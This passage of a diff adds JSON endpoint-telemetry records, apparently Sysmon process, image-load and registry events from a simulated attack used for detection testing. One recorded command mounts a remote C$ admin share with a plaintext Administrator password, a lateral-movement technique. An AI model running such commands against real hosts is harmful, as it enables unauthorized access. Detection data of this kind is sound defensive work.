"image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001085164E01}" + }, + { + "command_line": "cmd.exe /c net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7556, + "ppid": 2260, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883570909130000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", + "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001085164E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909020000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7556, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-001024194E01}" + }, + { + "command_line": "net use \\\\Target\\C$ P@ssw0rd1 /u:DOMAIN\\Administrator", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6292, + "ppid": 7556, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "subtype": "create", + "timestamp": 131883570909230000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}", + "unique_ppid": "{42FC7E13-CAE2-5C05-0000-001024194E01}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\System32\\advapi32.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\System32\\mpr.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\System32\\bcrypt.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "net.exe", + "image_path": "C:\\Windows\\System32\\net.exe", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909180000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570909330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 